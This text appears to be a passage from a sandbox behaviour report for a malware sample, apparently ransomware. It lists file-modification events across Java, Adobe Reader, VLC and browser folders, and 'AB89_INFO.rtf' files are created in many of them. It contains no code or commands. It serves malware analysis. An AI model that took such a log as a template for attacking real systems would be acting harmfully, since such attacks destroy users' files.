modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\reflow.api 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\InvokeSelect.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Windows Journal\Templates\Shorthand.jtp 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.SF 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Luxembourg 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-nodes_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Windows Journal\Templates\blank.jtp 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-options_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.attach_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Mozilla Firefox\browser\VisualElements\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\wsimport.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UCT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql2000.xsl 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_MoveNoDrop32x32.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\EST5EDT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\diagnostic-command-16.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-actions_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-cli.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\playlist\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\US_export_policy.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application-views_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\New_Skins.url 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\sv.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.property_1.4.200.v20140214-0004.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\VisualElements\SmallLogoDev.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightRegular.ttf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\servertool.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Vienna 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Bucharest 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Maputo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\bn.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-8 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\com.oracle.jmc.executable.win32.win32.x86_64_5.5.0 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\uarrow.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\jce.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+2 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Mazatlan 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\local_policy.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Prague 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\rmiregistry.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_sv.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\core_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\about.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\policytool.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\sRGB.pf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\Beulah 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\de.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\bin\server\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\olh.htm 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.commands_0.10.2.v20140424-2344.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.jsp.jasper.registry_1.0.300.v20130327-1442.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\visualvm.conf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-masterfs-nio2.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\ms.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Simferopol 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\CodeFile.zip 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\java-rmi.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Chita 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\about.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jsadebugd.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\PYCC.pf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\cs.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javah.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\Beulah 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-applemenu_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticnotification.exsd 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\ir.idl 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui.zh_CN_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\server\classes.jsa 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Yakutsk 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.descriptorProvider.exsd 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Iqaluit 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaSansDemiBold.ttf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\zi\Europe\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-8 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\epl-v10.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-tools_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\README.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-settings.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\servertool.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\rightnav.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Guam 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\am.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\security\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkServerCP.bat 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\feature.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Rainy_River 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\default_apps\external_extensions.json 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\java.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\orbd.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Caracas 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-actions.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.ja_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Beirut 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\epl-v10.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\orbd.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.commands.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Volgograd 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Paramaribo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\plugin.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\resources.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Rio_Gallegos 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Tongatapu 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\localedata.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-ui.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861258748.profile.gz 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Bangkok 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\fonts\TwemojiMozilla.ttf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-oql.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\alert_obj.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\appletrailers.luac 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector_1.0.200.v20131115-1210.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UTC 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Google\Update\1.3.35.452\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\extensions\VLSub.luac 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-remote_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Ceuta 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\zi\Indian\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\CIEXYZ.pf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Bermuda 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Aqtobe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\updater_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup-impl_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Managua 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Wake 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\mobile.css 